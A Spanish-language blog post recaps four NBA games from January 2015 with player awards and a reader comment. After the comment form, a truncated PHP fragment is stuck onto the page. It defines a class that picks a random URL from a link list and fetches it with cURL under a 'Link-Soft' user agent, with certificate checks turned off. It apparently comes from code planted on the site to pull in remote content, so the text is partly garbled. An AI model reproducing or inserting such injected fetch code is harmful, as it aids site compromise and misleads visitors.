La crónica: 9 sobre 10

13 de January de 2015 por MagicJohnson32

Sigue el milagro de los Pistons, de nuevo ganadores en una pista complicada y que se apuntan la novena victoria en los 10 partidos disputados tras cortar a Josh Smith. También ganaron los Rockets en un partido que vio la expulsión de Garnett. El United Center capituló ante la exhibición de Vucevic y madrugada se completó con la derrota de los Pelicans en pista de unos Celtics que se resisten a tankear.

Más detalles, a continuación.

dh_kg

Detroit Pistons 114 – Toronto Raptors 111

Se enfrentaban en Canadá dos equipos en trayectorias opuestas, los ascendentes Pistons contra unos Raptors que se van desinflando y que se mantienen en los primeros puestos por las rentas obtenidas semanas atrás. Al final, después de un encuentro repleto de alternativas, con un inicio devastador de Jonas Valanciunas y una segunda mitad brillante de Jennings, el partido sirvió para confirmar las inercias de unos y otros. Un triple de Meeks (autor de 11 puntos en el periodo decisivo) en una acción un tanto afortunada puso +4 a los Pistons ya en el útimo minuto, tras lo cual Lowry anotó otro triple para, a continuación, fallar en una penetración y perder la bola en la última posesión cuando los locales aún estaban en situación de forzar la prórroga. Detroit se lleva así la novena victoria en diez partidos desde la marcha de Josh Smith y se sitúa ya a únicamente 2 partidos de la octava plaza del Este.

Orlando Magic 121 – Chicago Bulls 114

La sorpresa de la noche se vivió en el United Center con la victoria de unos Magic que se presentaban sin Tobias Harris, Evan Fournier ni Aaron Gordon. Por los locales volvía Rose y a Gasol aún le llovían piropos tras su exhibición ante los Bucks, pero esta vez era el turno de Nikola Vucevic y Victor Oladipo. Entre ambos lograron 66 puntos, a razón de 33 por cabeza, con 27 de 41 en tiros de campo. El pívot montenegrino firmó una preciosa batalla en la pintura con Pau Gasol, que no se quedó muy atrás (28-14) pero fue espectador de primerísima fila en la mayoría de acciones de Vucevic, entre las que destacó un espectacular mate que acabó con el de Sant Boi por los suelos. Aupados por Vuc & Dipo, los Magic llevaron la iniciativa en todo momento y, fueron ellos dos los que se encargaron de enfriar el partido cuando los Bulls apretaron el marcador ya en el tramo final.

New Orleans Pelicans 100 – Boston Celtics 108

Lo más sorprendente de la victoria de los Celtics sobre los Pelicans no fue el career game de Jae Crowder (23-3-3-4-2), ni una actuación de Jared Sullinger por encima de la de Anthony Davis. Lo más sorprendente fue el triple en fade-away con el que Marcus Smart puso a los Celtics cuatro arriba a 40″ para el final y dejó el partido visto para sentencia. El rendimiento del rookie, junto a los excelentes encuentros de Sullinger y Crowder, acabaron por hacer pagar a los Pelicans los contínuos errores cometidos durante todo el partido. Su juego, demasiado dependiente del talento individual y de lo que fueran capaces de generar Davis, Gordon y Evans, presentó demasiadas grietas, especialmente después de que Holiday se tuviera que retirar con una inflamación de tobillo.

Houston Rockets – 113 Brooklyn Nets 99

Kevin Garnett sabía que, si sus Nets querían tener alguna posibilidad ante los Rockets, debían embarrar el partido. Su intento se le fue de las manos. KG se enzarzó con Dwight Howard en el primer cuarto en una acción que inicialmente parecía de lo más intrascendente pero que escaló rápidamente hasta costarle la expulsión al veterano interior de los Nets (no así a Howard, que se la jugó lanzando un par de manotazos y bien pudo acabó en la calle también). No brilló precisamente DH12, superado por Plumlee en la pintura, pero tampoco lo necesitaron los Rockets, muy superiores a su rival y que se sobraron con James Harden y Motiejunas al mando de las operaciones.

PREMIOS

MVP: Póker de ases. Harden (30 puntos en 13 tiros de campo, 6 asistencias, 3 rebotes y 2 robos), Brandon Jennings (34 puntos con 11/22 TC y10 asistencias), Nikola Vucevic (33 puntos, 11 rebotes y 4 asistencias) y Jared Sullinger (27 puntos, 10 rebotes, 3 asistencias, 1 robo y 1 tapón).

Rookie: Marcus Smart presentó candidatura con 7 puntos, 6 asistencias, 3 rebotes y un +15 para su equipo con él en pista. Pero el premio van para los 10 puntos, 7 asistencias, 4 rebotes, 2 robos y 1 tapón de un cada día más sólido Elfrid Payton.

Sorpresa: Jae Crowder, discretísimo en Dallas, ha necesitado poco tiempo para brillar en Boston. Anoche, 22 puntos, 3 rebotes, 3 asistencias, 4 robos y 2 tapones.

Decepción: Dwight Howard, tal vez descentrado tras el encontronazo con Garnett, se quedó en 8 puntos y 5 rebotes, además de que no pudo frenar a Plumlee en defensa.

Mayor esfuerzo en vano: Mason Plumlee 24 puntos (10 de 11 en tiros) y 10 rebotes. Anthony Davis 34 puntos, 9 rebotes, 4 asistencias y 3 tapones. Jonas Valanciunas 31 puntos (14 de 15 TC) y 12 rebotes.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Azabel dice:
    #1

    Increible lo de Detroit, no se detienen, y no parece q lo fueran a hacer, se esta viendo al mejor jennings de su carrera y Meeks comienza a justificar su contrato siendo clave en la levantada, drummond y monroe bajando enm algo sus prestaciones siguen haciendo estragos en la pintura bajando entre ambos casi 30 pot encuentro,

    Van gundy quien hasta hace un mes parecia q lo pasaban a retiro, hoy esta al nivel de un genio, cosas de la NBA

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>